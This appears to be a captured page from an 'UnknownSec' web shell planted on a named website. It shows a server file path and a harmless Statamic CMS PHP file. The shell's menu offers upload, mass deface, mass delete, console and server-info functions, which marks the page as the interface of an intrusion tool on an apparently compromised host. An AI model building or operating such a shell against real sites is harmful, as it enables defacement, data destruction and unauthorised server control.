shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Auth
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
UserCollection.php
<?php namespace Statamic\Auth; use Statamic\Data\DataCollection; /** * A collection of Users. */ class UserCollection extends DataCollection { /** * Get the collection as an array. * * @param bool $supplement * @return array */ public function extract($supplement = false) { return UserService::transform($this->items, $supplement); } }
© 2026 UnknownSec